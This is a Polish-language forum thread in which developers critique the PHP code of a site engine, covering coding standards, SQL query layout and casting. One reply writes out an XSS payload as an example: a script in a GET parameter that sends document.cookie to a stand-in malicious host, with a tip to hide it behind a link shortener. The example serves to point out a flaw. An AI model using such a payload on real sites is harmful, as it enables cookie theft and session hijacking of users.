ŁF napisał(a)
I jaki problem miało by to spowodować? I tak nikt nie usunie tych wymaganych plików.
Standardy kodowania... http://webdocs.math.univ-rennes1.fr/php/en/pear.standards.including.html
ŁF napisał(a)
Fakt, przydała by się oddzielna klasa obsługująca pobieranie danych z GET i POST. Ale gdzie tu widzisz miejsce na XSS?
somefile.php?do=<script>window.location = 'http://zlosliwastrona.com/zapiszinfo.php?c=' + document.cookie();</script> wsadzone w tinyurl czy inny serwis tego rodzaju lub też w ramkę umożliwia przesłanie wartości ciastek zapisanych na komputerze klienta do potencjalnego hakera. $_REQUEST['do'] jest tu tylko przykładem.
ŁF napisał(a)
To raptem kilkaset bajtów więcej, więc nie widzę problemu, a jest ciut czytelniej, aczkolwiek też nie wiem po co to $sql.
Adamie:
$result = $db->sql_query("
SELECT article_subject, text_content
FROM " . ARTICLE_TABLE . ", " . TEXT_TABLE . ", " . CAT_TABLE . "
WHERE text_current = 1
AND article_id = text_id
AND cat_article = text_id
AND cat_id = $cat_id
ORDER BY text_time DESC
LIMIT " . intval($param_ary['LIMIT'])
);
na pewno nie jest mniej czytelne od:
$sql = 'SELECT article_subject,
text_content
FROM ' . ARTICLE_TABLE . ', ' . TEXT_TABLE . ', ' . CAT_TABLE . '
WHERE text_current = 1
AND article_id = text_id
AND cat_article = text_id
AND cat_id = ' . $cat_id . '
ORDER BY text_time DESC
LIMIT ' . (int)$param_ary['LIMIT'];
$result = $db->sql_query($sql);
ŁF napisał(a)
Powiem tak: coyote ma trochę niedociągnięć, ale ogólnie rzecz biorąc uważam, że się czepiasz.
Tak już mam, 4 lat pisania kodu PHP sprawiło, że czepiam się szczegółów. ;-) Ale nie chcę, żeby to brzmiało jak "Ha ha ha, jestem najmądrzejszy, a wy nie potraficie pisać aplikacji" bo np. w Delphi czy Basicu pewnie jesteście dla mnie niedoścignionym wzorem ;-). Pewne standardy kodowania zostały już dawno ustalone, a kod obecnie tworzony najczęściej pisany jest zastosowaniem poniższych zasad:
http://webdocs.math.univ-rennes1.fr/php/en/pear.standards.html
http://www.vbulletin.com/docs/html/codestandards
Adam Boduch napisał(a)
Rozwiazanie zwiazane z pobieraniem rozszerzenia aktualnego pliku jest sukcesywanie wprowadzane w modyfikowanych plikach i zastepuje sposob pobierania rozszerzenia z pliku .inc. A dlaczego tak? Aby mozna bylo ustalic inne rozszerzenie plikow .php. Np. kiedys strona chodzila z rozszerzeniami .html.
mod_rewrite? :-)
Adam Boduch napisał(a)
Kto powiedzial ze rzutowanie jest okazem brzydkiego pisania? I gdzie sa te inne przyklady "brzydkiego" kodu? Rzutowanie w wielu miejscach w kodzie, zastapilo sposob z uzywaniem funkcji intval() i tym podobnych, wlasnie ze wzgledu na czytelnosc kodu.
^^ standardy kodowania.
Inne przykłady?
while ( $row = $db->sql_fetch($result) )
A teraz zapoznaj się z wyglądem kodu np. w PEAR.
Adam Boduch napisał(a)
Przyjrzyj sie niektorym projektom napisanym w PHP. Jest to ogolnie przyjeta metoda wysylania zapytan, pozwalajaca na pisanie czytelniejszego kodu.
Jedyne co w tej chwili przychodzi mi na myśl to phpBB zwane wśród niektórych serem szwajcarskim ze względu na ilość dziur.
Adam Boduch napisał(a)
Gdzie? Jezeli zauwazysz taki blad, prosimy o kontakt na [email protected]
Pozbieram je do kupy i wyślę...
W każdym razie całkiem nieźle Kojot wygląda :-)